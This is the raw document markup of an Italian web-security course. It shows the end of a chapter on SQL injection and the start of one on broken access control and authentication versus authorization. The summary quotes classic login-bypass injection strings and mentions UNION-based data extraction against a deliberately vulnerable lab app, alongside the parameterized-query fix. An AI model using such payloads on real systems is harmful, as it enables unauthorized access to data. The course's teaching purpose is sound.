    <w:bookmarkStart w:id="247" w:name="riepilogo-del-capitolo-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="509" w:name="sec_5_14"/>
      <w:r>
        <w:t xml:space="preserve">5.14 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una vulnerabilità che permette a un attaccante di iniettare codice SQL nelle query dell’applicazione, ottenendo lettura, modifica o cancellazione non autorizzata di dati. È</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A05</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Injection) ed è documentata da oltre 25 anni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La causa è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">strutturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il database non distingue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se sono mescolati nella stessa stringa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Due varianti viste in dettaglio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">login bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con stringhe come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(per esfiltrare dati da tabelle diverse).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">difesa principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una sola:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query parametrizzate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(placeholder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con parametri nel secondo argomento di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Niente filtri di apici, niente blacklist di parole, niente regex.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I parametri funzionano perché il database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">separa la fase di compilazione della query dalla fase di binding dei dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la struttura è fissata prima che i dati arrivino.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difese in profondità: account DB con privilegi minimi, ORM (SQLAlchemy), validazione dell’input, WAF, logging centralizzato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai costruito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerabile, hai eseguito due attacchi reali (login bypass + UNION SELECT), hai applicato la correzione, hai verificato che gli attacchi non funzionano più. Hai vissuto il ciclo completo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attacco → comprensione → difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control / IDOR.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il problema più comune del web (OWASP A01 da otto anni). Vedremo perché autenticazione e autorizzazione sono cose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">diverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, perché un numero nell’URL può svuotare un database, e come un controllo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ovvio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che tutti dimenticano di scrivere protegge da un’intera famiglia di disastri.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="247"/>
    <w:bookmarkEnd w:id="248"/>
    <w:bookmarkStart w:id="303" w:name="capitolo-6-broken-access-control-e-idor"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="510" w:name="ch_6"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 6 — Broken Access Control e IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="510"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 3 (sessioni e cookie), 3-bis (autenticazione delle API), 4 (OWASP A01), 5 (SQL Injection — useremo l’app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che hai costruito).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3-4 ore con il laboratorio. Secondo capitolo cardine del corso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> abbiamo visto che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control è da otto anni il primo posto della OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: era #1 nel 2017, #1 nel 2021, #1 nel 2025. Niente nemmeno si avvicina alla sua persistenza. Otto anni di tentativi falliti dell’industria di rimuoverlo dalla cima della lista.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché è così difficile da risolvere? Perché, a differenza della SQL Injection,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è un problema di codice malformato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è un problema di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">controllo dimenticato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il codice gira perfettamente, fa esattamente quello che gli è stato chiesto di fare. Il problema è che a nessuno è venuto in mente di scrivere la riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">verifica che l’utente sia il proprietario di questo dato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non c’è un compilatore, un linter, uno scanner automatico che possa accorgersi di un controllo che semplicemente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non c’è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Servono testa di programmatore e disciplina di processo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo capitolo ti dà entrambi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="253" w:name="Xe6602cf0dfd3b78a04aae7cf8ccdf21df71f25c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="511" w:name="sec_6_1"/>
      <w:r>
        <w:t xml:space="preserve">6.1 Autenticazione vs Autorizzazione: la confusione fondamentale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutto il problema del Broken Access Control nasce da una confusione che fanno persino programmatori esperti: scambiare l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sono due cose diverse. Vediamo perché, con calma.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="249" w:name="le-definizioni"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le definizioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, abbreviato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">AuthN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) risponde alla domanda:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Chi sei?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È l’atto con cui un utente dimostra di essere chi dice di essere. Tipicamente: username + password, eventualmente più un secondo fattore (codice OTP, token hardware, impronta).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, abbreviato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">AuthZ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) risponde a una domanda completamente diversa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa puoi fare?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o, più precisamente,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai il permesso di accedere a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">questa specifica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">risorsa o di compiere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">questa specifica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">azione?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le due cose si combinano in qualsiasi controllo di accesso reale. Ma sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">distinte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: si può essere autenticati senza essere autorizzati a tutto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="249"/>
    <w:bookmarkStart w:id="250" w:name="lanalogia"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’analogia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pensa al palazzo di un grande gruppo bancario, sede centrale. All’ingresso, una guardia ti chiede il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">badge aziendale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo passi al lettore, la guardia controlla la tua foto sullo schermo, ti riconosce.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Sei autenticato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il sistema ha confermato che sei tu, dipendente di quella banca.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo basta per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">entrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel palazzo. Ma non basta per andare dappertutto. Se provi a salire al 27° piano dove sta l’ufficio del CEO, l’ascensore non risponde: il tuo badge non è autorizzato a quel piano. Se provi ad aprire la cassaforte, il sistema biometrico ti rifiuta. Se chiedi al collega di darti i fascicoli dei clienti milionari, ti dice di no perché non sei tra le persone che possono trattarli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In tutti questi casi sei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">perfettamente autenticato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la banca sa chi sei e che lavori lì) ma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non sei autorizzato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a quelle specifiche risorse. La guardia all’ingresso ti ha riconosciuto. Tutti i controlli successivi hanno verificato che,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">anche se sei tu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non puoi fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">quella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cosa specifica.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="250"/>
    <w:bookmarkStart w:id="251" w:name="le-tre-a-della-sicurezza"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le tre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della sicurezza</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spesso le due A vengono accompagnate da una terza, formando la triade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uthentication — chi sei</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uthorization — cosa puoi fare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uditing — registrazione di chi ha fatto cosa, per ricostruire eventi a posteriori</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
